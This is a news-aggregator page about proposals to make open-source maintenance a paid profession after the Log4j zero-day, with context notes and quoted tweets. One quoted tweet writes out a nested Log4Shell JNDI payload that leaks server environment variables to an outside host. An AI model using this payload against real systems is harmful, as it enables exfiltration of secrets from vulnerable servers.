/
Navigation
Chronicles
Browse all articles
Explore
Semantic exploration
Research
Entity momentum
Nexus
Correlations & relationships
Story Arc
Topic evolution
Drift Map
Semantic trajectory animation
Posts
Analysis & commentary
Pulse API
Tech news intelligence API
Browse
Entities
Companies, people, products, technologies
Domains
Browse by publication source
Handles
Browse by social media handle
Detection
Concept Search
Semantic similarity search
High Impact Stories
Top coverage by position
Sentiment Analysis
Positive/negative coverage
Anomaly Detection
Unusual coverage patterns
Analysis
Rivalry Report
Compare two entities head-to-head
Semantic Pivots
Narrative discontinuities
Crisis Response
Event recovery patterns
Connected
Search: /
Command: ⌘K
Embeddings: large
TEXXR

Chronicles

The story behind the story

days · browse · Enter similar · o open

How the role of open-source maintainers could be professionalized, as the maintainer who fixed the log4j zero-day says he works on the project in his spare time

Open Source software runs the Internet, and by extension the economy.  This is an undisputed fact about reality in 2021.

Filippo.io Filippo Valsorda

Context & Ripple Effects

The professionalization debate follows a long-running mismatch between the importance of widely used open-source projects and the resources available to their caretakers. Earlier coverage documented maintainer burnout around projects such as OpenSSL and found that most prominent Open Collective projects earned below industry-standard or poverty-level income despite their broad use.

The Log4j response turns that funding debate into a security-responsibility issue: a maintainer handling a zero-day says the work is done in spare time. A 2021 maintainer survey likewise found that many maintainers were unpaid and that paid work was often minimal among those receiving compensation.

First-order effects

  • Professionalization proposals put the gap between critical incident response and volunteer availability at the center of the maintainer role.
  • Volunteer maintainers of security-critical projects face greater pressure to secure dedicated, compensated time for maintenance and emergency fixes.

Second-order effects

  • Organizations that rely on foundational open-source components have a stronger incentive to fund maintenance directly or through shared funding mechanisms rather than treat it as an external volunteer service.
  • Commercial approaches such as more restrictive licenses gain relevance as projects seek durable revenue, extending an earlier debate over monetizing open-source software.

Third-order effects

  • If professional maintenance becomes a norm for critical projects, open distribution is likely to be paired more often with explicit funding and accountability arrangements rather than an assumption of unpaid stewardship.
  • The security burden may increasingly distinguish infrastructure dependencies that require sustained institutional backing from projects that can remain primarily volunteer-led.

The trend: Open source is moving toward explicit funding and accountability for critical dependencies as volunteer maintenance becomes recognized as a security constraint.

Discussion

  • @yazicivo @yazicivo on x
    Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
  • @filosottile @filosottile on x
    This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. “I work on Log4j in my spare time” “always dreamed of working on open source full time” “3 sponsors are funding @rgoers's work: Michael, Glenn, Matt” People, what are we doing. h…
  • @filosottile @filosottile on x
    No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF “Project Management Committee”... AND NO ONE IS PAYING THEM? https://www.apache.org/... Open Source needs to grow the hell up. Yesterday. https://twitter.com/...
  • @malwaretechblog Marcus Hutchins on x
    This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
  • @campuscodi Catalin Cimpanu on x
    The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://twitter.com/...
  • @_staticflow_ Tanner Barnes on x
    In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
  • @minecraft @minecraft on x
    Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition. The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify. https://www.minecraft.net…
  • @matthew_d_green Matthew Green on x
    As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://blog.filippo.io/...
  • @chromatic_x @chromatic_x on x
    Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers. https://blog.filippo.io/...
  • @milesmccain R. Miles McCain on x
    The world would be so much better off if maintaining open source software were a viable profession. One day...? https://twitter.com/...
  • @caseyjohnellis Cje on x
    hearing folks compare #log4shell is “as bad as heartbleed” - imo it's much, much worse. aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher
  • @eastdakota @eastdakota on x
    Seeing attackers exploit #Log4J to drop #Mirai. Bigger, badder botnets coming soon... 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖
  • @runasand Runa Sandvik on x
    Reminder that a lot of the technology we use relies on free, open source code that no one's paid to maintain. https://twitter.com/...
  • @mattficke Matt Ficke on x
    Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://twitter.com/... https://twitter.com/...
  • @filosottile @filosottile on x
    We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. https://blog.filippo.io/...
  • @joshuapowell_io Joshua Powell on x
    I love when people share ideas like this, especially when they're backed by current events #opensource https://blog.filippo.io/...
  • @adamwathan Adam Wathan on x
    Great post — charity-based open source is very naive and unrealistic, if only because its 100x more complicated for a business to pay someone for nothing than it is for something. https://blog.filippo.io/... https://twitter.com/...
  • @pixeltrix Andrew White on x
    This is well-intentioned but saying “companies are in the business of getting what they need—by paying invoices” show incredible naivety in how bad companies are at paying their invoices https://blog.filippo.io/...
  • @oerdnj @oerdnj on x
    This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://twitter.com/...